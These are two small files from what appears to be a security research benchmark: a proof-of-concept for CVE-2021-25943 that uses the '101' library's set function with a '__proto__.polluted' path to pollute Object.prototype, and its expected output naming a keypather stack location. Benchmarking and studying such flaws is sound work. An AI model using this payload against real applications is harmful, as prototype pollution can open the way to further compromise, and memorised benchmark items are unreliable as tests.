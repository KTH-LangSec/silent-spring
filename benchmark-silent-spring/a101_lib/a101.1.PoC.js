//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25943
const _101 = require("101/set");
_101({}, "__proto__.polluted", "yes");
