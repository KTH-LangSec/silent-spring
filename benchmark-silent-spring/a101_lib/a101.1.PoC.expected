node_modules/keypather/index.js:32:16